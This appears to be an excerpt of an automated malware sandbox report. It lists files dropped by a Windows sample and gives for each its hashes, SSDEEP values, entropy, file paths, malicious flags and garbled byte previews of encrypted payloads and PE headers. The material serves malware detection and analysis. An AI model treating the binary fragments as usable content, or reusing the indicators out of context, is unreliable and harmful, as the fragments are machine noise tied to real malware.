                                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: SeT_up.exe, Detection: malicious, Browse
                                                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                  • Filename: 6duXSAApsY.exe, Detection: malicious, Browse
                                                                                                  • Filename: 6duXSAApsY.exe, Detection: malicious, Browse
                                                                                                  • Filename: mod01_pdf.lnk, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: mQC9xlWFZV.exe, Detection: malicious, Browse
                                                                                                  • Filename: mQC9xlWFZV.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1256112
                                                                                                  Entropy (8bit):7.999866880745113
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:24576:L+ZKjU9SM7/TEQPeSHBXGXHe2Rv1pn4BV3dcmGoJMvNBJzinlvZRqMZr1w:64js74F4XG33Lpn4BVNcmGgMvzJzilxo
                                                                                                  MD5:6E8B07409FF18B0CB1B0E38184765FA6
                                                                                                  SHA1:12D3C676AFAA0ABDE5E5510F3A6FE553B83F7830
                                                                                                  SHA-256:7073F5D927CEE5753FFBB48022CF8C133DAAB9F29E07915AB9E85D472C691E66
                                                                                                  SHA-512:19ADD7C2574441331360EBE613097C0CF01B1A5869E8AC9F8E9B2C7B6C0F6BC973BDDA0D7F899A7130499B8D75E9547C22B4956B80109DB636527F5B3749EAC5
                                                                                                  Malicious:true
                                                                                                  Preview:.).5v..bz.U....:..!..#`.-`...s..OO.!.niw0...o.N]..%e.?....H....i.M..m....r.|..n1R.....5Y.fS/."........[..%=.:&z..g6\A..=....6z...u...AzO..w.....PT..L.#...c.Td@-^V.....&..K..j.l...%..|.R.O..h...It.s..`i.0?q.;WC..9~.dk..]...GS...S.........<_H....[..o..........|.`n....^...y....`.N..m..^?..&......f.B...B_G .o.._...\yr}...48...I...w....+..=........o($.Ihv....OU..../%.MN..a8~....`:...LD.6....K.......!.@..0.[...X.{..P........r.e..G.V&..E.KM......O.?..(:..N1uB.x.V.....r.s.....K...\.G....\h....,...l...%...Ar..%|.:.......N....?.....FR..<....=...E...V.:.6.....11....T.6.b.+.:..c.j...SF...D.(Q..j..2<.$...o9...{HW@o....`R....y.3...-b...q....HYC..R..T...;.....K`....*..t..&.85.3g..H..P'.~...LL.eq..3.1.6..).i.....k..T....C~s.f...:.4..V...'s....$..HF...|.:..e(......Y..F...BEJ.|O..X.....q...R.e`......8.....:d..<.(<..f3N." ..I.L.K....MV.&.}....<.(..7..)..d.7..W.D1..2.c2@D.$...$.5#<ZtG.[.5...-.%.Sk.:A..N...b.*.......6$.qSP...!5.=b....}..V;....1.5.. si..i.8/..Y... !R..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\422648\Ai.com
                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65440
                                                                                                  Entropy (8bit):6.049806962480652
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                                                  MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                  SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                                                  SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                                                  SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmp
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7
                                                                                                  Entropy (8bit):2.8073549220576046
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:aN7cn:aNY
                                                                                                  MD5:480FBABCD4B0BD39E9BA1730DB952A16
                                                                                                  SHA1:92977CA114F7E1D754983E9BE1525B89D0618AE9
                                                                                                  SHA-256:4BD687B386ABC2DE0CE99EB0B0A31C1124CCCD34468F53F9283D374958A54F1A
                                                                                                  SHA-512:C20FAF3823F290A65511E059481EC8BFC8722E3DBB68361B1CDD5256BA95DDA0BA9525551647F55394ACC64423B3557ABE1A326124CDF9209F76399B6A5B4C6D
                                                                                                  Malicious:false
                                                                                                  Preview:; Empty
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):68608
                                                                                                  Entropy (8bit):7.997340170550634
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:3li+eG35jdpQfcn9hOnBTtNWf2tEsc7dvbzcZyGD8aY0:5e6QfcnHmBBNWf2ttEfURgn0
                                                                                                  MD5:71E46F1884C14150D1EA7C967DC18066
                                                                                                  SHA1:5E1B83A4C2B04BF709471F77954641E39B3ED8DA
                                                                                                  SHA-256:EF7D2B9FC43DA0F93650C7C059358268B9559B2088A9F13C44D85909B1139D98
                                                                                                  SHA-512:0B3C318A8296DAA87EE78EAB8F3EA57C32543B03C50D903C876918D777FF069AFED1DACC92B2798795463D53F092B94BF81A3979C6E0547DF6B699B7DC541636
                                                                                                  Malicious:true
                                                                                                  Preview:.!.R.f....%...{.a.(..O.&P.R.x..y...Q...&;X...~.uk...%.&..,;......i.{aC.......s.R.u....8?.s./(..6....M[..W...D.C%r.z.<.2.n....#@.....w..z.q\[{.`..?...i..Qq...q.I...].x..A...@D.<..$..h.><..iw.?..={@P.b_.H...|.z..6Pu.....&..SxE..I..'........}i..&..9P.;A..i..mUH^.R..h".of_..!..|....Yaf.Zr.BQ.,...J.X1....>.u............@.@..{.:..............V.n....$l...d....m....L.)..v].ik_ZV.d].9.x.&.s..ET..F...;n:..bx.,.a<...5.....$.B.... .g.....|.[.......<.m.Z..y-SE.....\.......X.1...T..P...^...!.....g.2H...u..U.../.P.g...Y..9....~..r.'..V.....qnG.........}.j..>..xG.w...je.<.u....HR..1....+MZ3.7s..Nu...;..|@Y2[z..n...P.(qR.Srz.Li...]..q.H..@j-..h....Dv.T/.`..(..A...5h.-...(52TW}..4/.t.xK....r....I&z..l.......j......<....{.)....R.......*.B8...*.}...Y..9.9j..T....y. .b.., ..`.C.{..};....$.]..*.?.g..)N./..`;7.$f.U.(.......K.....6.....0@....Z...t1.3...b...v.I..c..5.3.?...:v6f.c.1...........Z.'..b...vB ..B...'.&..7..m.1.}..~......FB....>J..T..>1..b.-2.k...4!.."....
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):81920
                                                                                                  Entropy (8bit):7.997482356427176
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:p8eDfL5ppEpLIT2uL8kdF1vDLKDwxCdnuoCZHrfnVVHIWBFEPC68+dFBY1:Oe3pEpLICm8y1rLKskC1rfVZISDw1Y1
                                                                                                  MD5:9809A18917BA24EE92FE727A06676B34
                                                                                                  SHA1:AED4386177ACDFDBB9AFA569627565F0254CEB16
                                                                                                  SHA-256:FF4EED0E6BFC902CA6F90D6695B07CAD02E74F185330DA7A130839621F373B37
                                                                                                  SHA-512:CB06482A68BAAEA02FA7BAD87906B7DF4394182A111A1E6EBDB663EDBDFCCD1F8B24CD14E05DD40FE14966EBF31387603AEC1C75BFA22E66D6CB8130699C4704
                                                                                                  Malicious:true
                                                                                                  Preview:dE.....$\..N.W...J..<./....0....0.<Tc.....g..q[NkB..Z.]..c.E.$..@......Ij.f..c..V...l.0....#..tMN.+P..q.H-_.~.m.l}[./S.....}......(..p.}..`xl4..=Yez....=~.k.%.)1.....YE..V..H...5..e....W.5.^.zy...@.V.K...0.d..P...3..KC.].....4...}6:......%$.,.....4..mr..G..}........7.x............S.....Weg00M..=...i.....(.S...8.E.:/(.1%...l.....(..U..y:...'U....|..u..e.W.V~.w..FW4..../.?...<+]h....d.u/{G..!/S.8....."'Y..^=..r.j8..Mg.........I.-.)...4.......W..p7...a...rkT..Rm:..Vg.7*.D.Y.......GY.|...].Q.L.w.M.9N.bM......&.r.9kx...$..U......j..vz$.B<mt.3..N...|....?.3.....d1\.y..2...[....q.x.>..!v.S..jx!.............tu.BN7.I.(..o....3j~..L...V.{.:_...t#.........k..J.'...uG...R..'.0.c...k.....j...;P.~a.....IK.[&.....[y]Y.....x}...3.if9..o..a.`......J..|Mm}....q.+.......*......".+K..MI..Uf.x...#on....F..%j!>..0PR..?...Q..a.;N1u.Q.a.X....,........!.....8.v...p+%+..2XR.k.5....{.....N..b..%...$q..T.E....\W.^.<.*P.i...)...12r.!....$b.,..y.%{.......[#....Jd..}
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):55296
                                                                                                  Entropy (8bit):7.997020308434422
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:x8he7KWJARYbkcUsIQ0GhRPkeyO/oy0BXlf7s69AqoS+:x8hehJ/vWcR8x2R05lFAqoS+
                                                                                                  MD5:FCE6C8685C46C53D577525264EF2E6B7
                                                                                                  SHA1:6C956238AAB3CF294F6924608634E6C01F9D81D3
                                                                                                  SHA-256:E6A46CC210C6B1FC18C4F946F788C72352DAA89ECD52609B2237403E582F3D0F
                                                                                                  SHA-512:4F271B303FAA19BBA5E83E01486E6C439BC425DD8103B93537CE443F94EAE6A7BBB85107B1D034ED6C9845D3FEB09AF9389046EFAF78A37AAEF19E14AD0FF90B
                                                                                                  Malicious:true
                                                                                                  Preview:yY/O..!J.5..`.9\....g0$-,...........O..L...G..8w..D._..`.\.x.eF......j...M7s.....`"..xm.O.....!.......e.$.B..X..IF....<._6.T.8.W...\.t..{U.}.D.w........y.C..I5:...o..."+.S..q......i.IZ..U.....4....Q.b+..M.e.no..q...h..C.....<..,... Z...v.X.&..S^.f.ig}.EA.>..........Q.V..m......h.4...+.aJE.....:(....t.?R...<........x?f..o.......7..Y.:..~..y|.m..a.....1.:._.p.q..#.Pl../...x`C.Ev<~.....9.Q....'b{0.Z3Bj.]..%%..._1{..9......@....k._$|.....H.m.Gv[.8G.:..........X0.yM.yjP...w.G .V3z".#.3.r.....X.`..7y3.H/...vJ..6.I\..m.O.........c......q...PVg...k]$.v.(..s,|..w.8.t7.uV.1b.].........V..3..([..Pw........N.S3...7.....U<...p.6v...*....+.tM.2`.D2.)LQ..p...8...{.=h..7JD..2.b.........m.k..]..2e.`....Z....6.....]+`i..~.\6Y...J#.5P6.....].r.b^R.O.Eo...4....YH.w.....Ed6..)g.-........C.'..2..G.e...)^...a...F[..@...|kQB...t...9.y....#.[....@.......i...D.F.......h..'"..e..../.kQ.(..H.}_.R...j....\.'o.d.q*......wO..>m.D.........Q..e.....3...............
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):89088
                                                                                                  Entropy (8bit):7.998047953707022
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:7tQt3ofhRHEeoLScRGX0Uvu8I3DQmzYks15PUVqgbwCH/kBJwKeiC+S2/s:GKfXH1oLScG0DJ3DQmMksrPQO0/kbg+4
                                                                                                  MD5:BB84892D12C4454B33438D9C6E72D232
                                                                                                  SHA1:F23AAEABF65EFF2CEC9078536C4994F83D23CA47
                                                                                                  SHA-256:44190D0F113FB40CD22C7BDE6F7CFEB61274513FDA3B2B6F26820A14E0706D21
                                                                                                  SHA-512:763A2425249377E4919CB8868C41B0AF2BFBF9F9E8CE854704E42F5A152387CF66B64D279DB0A9C3F6FF82295EB5C7912397F6B7F501482E57CD73C52CFA23F2
                                                                                                  Malicious:true
                                                                                                  Preview:.&'"Q"D.c..p.%J.+...R.7.<...5.....pN.....u??....(6/_M2.'..e....+>...V..w`...dK.......?...*v<.c3n|R...y.Y....+R..$....=...:j. zb....Mf:..20.;..w..'s.+.P..sx........:.._..=..b.d.3...F.3..vq.k.I.."......_....3......Xm..Jt"....J....l."...;9.r..X.W...Q.<.pY.9/.Q..\\....3..Q........ .H.^.P...."....w."w.`....q;..._..4.z7...........1.h..uf[.....B......|........x..-.=...&.w.d..0.sZ.c..8..+bXlI.w.9...Y.r..U.>..xUSp4n.....P.R.....:....#....u.....&i.F.._..3A...U....W../.l!..}....7.9e..i.J....5PB.e..H...{:..)....=. ..:..^..W...QE.#k.QI.x....I.L...7.x.n.u.-.....'.Z..g..k.`VDb.@..>.....&.n...fe..K.n8. :...X!T4s.......B-..E(.E.p.a.R...?..S!iR.1.j.X..U..K..^.~...i.M..S...^h.~.T..[..}f.mj.........M.R.......$+4.z7.......[IYd..sP.......U.mB:.?..T.)....J....O.....D..........Q.r.....<d..@..i.'+$.R...n..ZB...[.......|./.f.N.7..U"..[.G...2S..!....+/V]G.1..F....E8........h.....0...M.`.<&...S.k.K....w..'P.....l[.6B.+..k1....W.n.>.5.[.?z...\.y.X..../
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):72704
                                                                                                  Entropy (8bit):7.997725069941207
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:76nMjVhZ1wpZjh3alow11/RCnzL2ILp+rLuTkIBBQxHiNB0VF:unMRb6ZjqD1xSzSILU+geBSHiY
                                                                                                  MD5:31388E6762254555030F6581ADC744D0
                                                                                                  SHA1:D3D119E6FB5715338425B3A2D9CCA54ED1F55829
                                                                                                  SHA-256:83D3DC305650F2CCC5733DD71B1B360F521DFA2C63B66703116BC5634AFEE463
                                                                                                  SHA-512:B1A21C817E58E3E50FC68F5DDF04678541E28E7A6137280C1D8B4926B388496132825C53A6FF842124CE4A6BEC48E72F5540CF79740C6449639EB3F9084FDB05
                                                                                                  Malicious:true
                                                                                                  Preview:.N.<.o.q.....+...R.Ma.!.o%S.g..3....@.5.'..T...3U.m#....'...1^..ZR...+Up......S.S..(%ET...t...Xgn..Xr..6.V:.4..?C.I...|`2w.xp......),(W..8...4.n.dF....e.>c..\..7....(4v..Nq...^#jf...fe.)...Vs6D..7.+.........G.p.C..i.....t..[f.I...Z..H..K..b.o.s*..+./..aw..M.V.Q......n)..^.8.:.....l...)?..S.~9.qO....~.}..~ar.L0.N.h.s........x6S.y.|F6!...!....s....B&)..\...W..:....Y#..Ix.dR..m.P.........[~x....Q...6..j....t....mD.).V...dJBFu.K/.d.O).3Ad{..D.....=u..1sC.AX.2..aA...p]....S........<41. .v.....YL!6........V3"o.".1.O.+.]...[ui.$........2..juo.A%...o.....D....tg....8..-h[.(.fG7].?.....l..N..r.}...Y.dZl..0..c..tD.v....F...@R.'A.=..i...n...g:..-..m!....b!.}......+......2$.....}...%.k......l.Bw...../..P......M....7.......b..0>.Y..pX../..Ql.G.~.,.&..Qi..6v.=...(....Iy..J/iz.>.q..Y.....T..U.X:.).qC..6./....~<?n......j[@.._:`..E"'...._....]N?..asT.X..N.r..^-.~J}..\.b.?.l1....N.......f2g.d.. ...$2]..6@.(..C.5J;....9..$.cV*...1r.k....Qj...y.........>=.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):96256
                                                                                                  Entropy (8bit):7.998091359440897
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:mTRwSehVOH+zKiuJDxQZHlnt3ZbyeG9cBNcVT3l0voeUvqVYmjMa:m1QfOee7QZHDZGpwo7l2oJvDmjMa
                                                                                                  MD5:97B20FC351EE73AF5412D2CCC98C5B6E
                                                                                                  SHA1:CA13078B5891903759549595406BEE0AA6616CAC
                                                                                                  SHA-256:C506F0541A4089D7E698269D819857EE788AC92E6FAC28ED25D207B642B81A0C
                                                                                                  SHA-512:6AA4265A17881BDCBB384C35E82A097B457D0FD45B3544CB021CB3786B09DE7B8FBBC85AC33D5261AA6A1CD3BFB8E2C58C4BEEC8A400BA4F138E558A3A59504D
                                                                                                  Malicious:true
                                                                                                  Preview:a...c.....i......QD..y_v.pO..7t....Z-pt.T...u...sd..K5....B.s..L.H..C..c...3'..JF5...T.a........|........2.r#....G.P........RZ.G...U....a..4]Bia...]..P...9...../..c..U...t.6n...?.%g..*.<.LA.S...E.csk..3...F]r.....Ycq.M.@&O:...H.*.Z....MT,i............b.VQ..../.....S..I..y(C...&e...H..l......._..B9 .G5y.D....u.%.O..R.P.2..|...s......c{..T........pG...-..Q2u_...9..O..U:rS.F~|..y.....m....J......;=.H?.!.;...1Aw...f#~....w.6../+<4......u(..xz.^..O.h.[.....w..h.U)..;..M.F"K..r.....?..#&.@...(N@..d.d...x./K7.Q.B...}.j}..*.8.....9.......LE.X......B.K..K`..w?[}.(..K.9.........%..<1..,I8'Y).e....j.,.pw.......iK..v..C...-.]Er$...nL.=0...^.r.....>.6.....-I....>....B.......=..O..e...PvS.s..RK'.H+.O%..AX...=.P|.!.=w..H...7...B<.P.%..t...CkJ..w......7O@eh.{W.M.4"h.....M.....A....!E.G./.Av.d..C.p.}...q|....4.M.`.....Z.H..qPIw....e........D...@....Q.......).g.+.. ..]I].z/......{...J5S...O.~.>..-...}^.+e....'...8b.c.3......J.E.c....4.4}9P6.%....I..1.t.[m..0..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):92160
                                                                                                  Entropy (8bit):7.998232836008428
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:8aAcKJGGOuKrovwGTudGZrBfVzZyOA18eJnIzQBcOU9cHMp2H38jyMuL:8aA3JLkrQudGZ3ZkZIUBUCHMp2X8jyV
                                                                                                  MD5:EDB65C718E78F719CE2FCB4E0F690EFB
                                                                                                  SHA1:16F32E827BDC9473A71569CDE188DD308490D8C8
                                                                                                  SHA-256:5C198C20AFDE1871D500ACE7032A2B028C63DED8B7331F9AA6AD8EEA17CF3B5C
                                                                                                  SHA-512:0B9351F1A0B35367A7CEB270784B0654C98FF15C85C31380ADCECB504848152EB75699FE4B1CE6F12FA8A2496B5453BE4476DD161E05A332D4B5A82B25CC71D3
                                                                                                  Malicious:true
                                                                                                  Preview:..:Nki..m......\..n.._...#5E......`W./...y...&....56~..O..l..~K/Ff.t.....o<.#5.I>U[P. _..k6....+...#.7=.....olrdl.~8.6 ......]k.)3!...S..%.(..IU...Z..Q....".B......3...B:....f.\5.uMU.U.&9....f..mq....^T %~G......t@.....;a........[.}K.f.....v.v....*.......,.B.}./.n-..".?\O3.._Z..r".!.Q..e!... ....G:2...\Vc...~ CfO... F.F....I..."..A..y......J+..X[..O.b..S..p....ez..[.*..Z{:....=.....[.6$..mYx...A.G..F........V../.P.].\O.g./...x...@~..&._...mwp..:|.K..<.Fb.I.I..#....`...!....GGo5f..!....?t.2../...(...F. .....H..q.Q.H".GH.>...:...j.l/.....}I....._........B..>2...fm.R.`jG.Dn..Fk.mWL.....~.G .q..F,H....a..UQ..F...A.D...xa7v.c..q..M-I.3..k/...!.^.K.L<..+R.)?....`....&....y3....G.....Y+tU.@.T...4...~Tq..6..h..9.....B..G..M.wD..q.V........!.+"gL.n.....=.~.f{N.z....[...|.............3.%.+.)...Cb.?...47%.X..I...Z.._.<.....!.6.k).>.Pk.).".7n.~.......ni:%....IA{/.6..M..K...[.5t#.^%.i.A;A.LY..RYnW#.1l.....?..............si...A..5..O?...,Q#..{.n...N..(.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):56320
                                                                                                  Entropy (8bit):7.996765273361241
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:KGBxHK69Tyd1boZ1Bt57pW6i/upRk3uaI/t:KaxHK6MkbBeuRl
                                                                                                  MD5:A67945C9242D09BBE114AAF14A9A6D64
                                                                                                  SHA1:AB0689E9B2BE88BDF5F09ABFC7D1898142504D31
                                                                                                  SHA-256:054CD0E93F857CC3733202A7979D704F900FD5139086C553BD0237568A6BD9F7
                                                                                                  SHA-512:412443780F91C2C2BC2B08E422F80DF041A86EA2ABFD641296229CE447B40CDB058F706C0CC30B424502C311D7FE958DB0834CB65B2814B4D3AC727A81E5BFA0
                                                                                                  Malicious:true
                                                                                                  Preview:K.+.....qi..U.....H..cO!o5U..O`.....E.6.K...+...H.Cb5^.&.....B.?.T.b.#.u. B=.%..c.....c$..g.U&S'...;$......?:.E..Ym..7.....*,6..g..L\..^.f?7..}..%L.......F^...0...{b...)..m9...^..v<C..A*.r..k.\q....,AQ.+......8.x...a..SZ.Y..9...((.9....O62....$.;~j$y..G..Z,k..z.g..H..].}.Q.y...vvU..}..$..*k.k...U..e.b.B...!.amg...41J..x00....K..8k.u.".<p.-4f...S..9._k............i..`._.....8..3....z...p.........[SI....fZ(M.E59.....].U.$=...Px|R.z.Q.H..<.ad_'w.T...[...M..R.V................p...v..%...I.P....}hXy........m.z[....E.+.#.'....].{#p.O........l.c..O.V`7TRLR......Z..~.[...9.......eT]{......2z.t....3...u.=..d[..........&..Wh.>...<h.MFy..X$I.z..o~XUq..,$...H~... c`H.-..XD..^.....(w.4mFP~....7...Q.....fo...Md.N..n..8.Yt..']..n..[....p.g..y.E}'..:..gtm..j...H.s..1s.......0.]..VOh....+2..0......#UgBT......9.T...kj......r........c$...:[g.BP.........=.&V......2.%5/b..(.....H%..j. ...j.l...>.8...........*g...I.]....... [..\.N..L5p...X(q....7....
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):30384
                                                                                                  Entropy (8bit):7.993779441518898
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:768:tKplLpllliw0VeXkn52+1fRlXKxcbB3VyTIr/u1Mi4Nk4:tKTpJgnPf6xct0KuGXR
                                                                                                  MD5:281765F4F2B2961F2D51BDAF401AE04B
                                                                                                  SHA1:ABA89180D291B370EB5E93099D8AE3AB92103E42
                                                                                                  SHA-256:A25174713BE450A1E0BBC908CF8BE5DF1EDDB2BCAA5E7C6B039FA85CB2CCED8C
                                                                                                  SHA-512:EE0D2D7BCB1E0B9642986CE324601D22958927657A3A81F5F0D9C21FE5E8015C6DB7A2B17787BE2F1DE161E9B78135AA5D5209D2E3D9F4C5A76A7480A6A30CFE
                                                                                                  Malicious:true
                                                                                                  Preview:..D.G.......1.....oHW.6~.....T^...`...v../.....#.....p.....e.UP.....?....t....=.3..4...e.....+L?m.....,..+.Q..R..!...V...q...vG....a...U/.....!.......wr....}..JXf.j..p(.U.`..yQ..H...uR;.....(%...S...m......S[.......:?x:...S...zw.$....H...! .3.....FF....x.........~...G;i.......~..x..X~..\.#...P.*.#.G.6..G&..p^....O....o.~...'n;q.V...{u..../.'.mo....$.F`....n.....5.*...-I....X.6...%...........Pw..-+..,...6....3O._.ujI.M.#.5OB+2..+..c..T....D...5.jV...:.....>....O...._.7.>....h.\..D..<.p(...n.Hn..!.R..S....|@l.O@~/...r.R.H.H...kl..XAv.+.L`# ....../..(z..!.8.'..z..,........J..t*m2..A..NB....G.X^,z.T..^~b#w...$...I.........W.F...0...Oa. t..$......*b o..\..*"s.h...%."5.tN...M.?..<.....vH..h.^c....'......0_..#...._Zz.;.5SK...0N.l..I.c..=....o...N.....R.........9..rn75.s....%......M...n..9.r..PK...J.xi!H.3%.14=./....o*..'...x0.sVl....I:=....4.2.....J..6.$..V5.P..d.....#...jW.A.~.s...|..lh....S.g./.8!~b.!..RP.!.....q.%N.......h,L...
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):80896
                                                                                                  Entropy (8bit):7.997428094801003
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:ngaMBPCNLH2D+a5jw66Zf/FD/Eq2HwwZKFbtis5LZQIK954prpxhf6wq:nAGH2If97x2zUrLSS5pxq
                                                                                                  MD5:EE5B0EA84393A623E11B932BCB0F5952
                                                                                                  SHA1:2CDBEDBF550A5F2B0B00DD1F82772E101550EA12
                                                                                                  SHA-256:93481448E25DDD32556336E670C1C08BB93ADDDE3AC9BA95754F0C40ADF251EE
                                                                                                  SHA-512:924C7EE839E68C173C1C1E42C6744E218E75EEA694862C9BA9313B7C16C2FA72D68C7F06D09FF083BE61FFFF163114B6585DFC6868C87B21E2F1A8D56A683F3A
                                                                                                  Malicious:true
                                                                                                  Preview:"Y]m'C.}.....z.....x....<5...s{..*.7...CG5...X..u..;....../}....:;..7..K....oT....S.....%>_..*](.V.^.k.k>?T:}..X.>#..Q.O...1T;..j......lJ=W8..:.B..l.........F......d ^FKY.....x{;).3...CC6...k|L.?...Hnt+..u$.\5..=|....~L...sUC...b.S.SPk8...G.);Ozg'...Y )8X..@.....5=E.I(.r.TTq..nzF.a)'VG.@C..0..-.A#..>....&.:...-H...:......RVgu.6...X.........op.L3.17...U2.8..V..>..Wy.R...X.)d.p..Lw.g.}../7...8.....q%..$>G........qvW.m..].....r.O.....,QCt..k.AA.U5.r...,..K`.........pscQ.\J......=.d..Cl.+..o..^........P.W...".9...;.}...G.>l...>.b..uR.../...B"......|..g.....?3.."..v\.(c..I."5n[....p...X.+.i._........].}..........G.N4...F...A........l..I.P.qaN^.|ZYV....C{..ms..o...OOQ...S.#{....:g.f.$...$...&fV.W...{.,+$...{.`.f.t..p5W...{..J.4g..<F.vZ...k.. .F..}.3..Wr...NV_..[.).D.jXk..5.3.G.S.AI}+3.u...|;......t..n.......)..$5{ .^&...D.mP..9.`.d....?Uu.DT..*S.Nk.~4.N..3./&c.?s.....n,..?..7Y.8.7.\.}..W...kk....V .....Y`...K....W.......k...."xd....:!..3
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):61440
                                                                                                  Entropy (8bit):7.996955834088863
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:gZ8hvQy2rgN7C4MV0nxU1cI2EPD6YEWYgvwnF+5:W8t0gN7juImWIJ2FiG+5
                                                                                                  MD5:165F9357850CD07C17CEE9A2BE519B69
                                                                                                  SHA1:C5D9E877F03E613E6D998A77DE928B03F05B0854
                                                                                                  SHA-256:5B6F891AAE449A6F4E1814C5E82281BE3C5F5876A6BD0A82A98AF9164B7125E5
                                                                                                  SHA-512:974EC2FA68FB449415459CA014CF3915E8DBE452A4EC94BF506586035ED5F3C5D41DA98FD2A7C9F59D88F8C8BBD751AB6947FF48FC64538A8C60CB98E06AE274
                                                                                                  Malicious:true
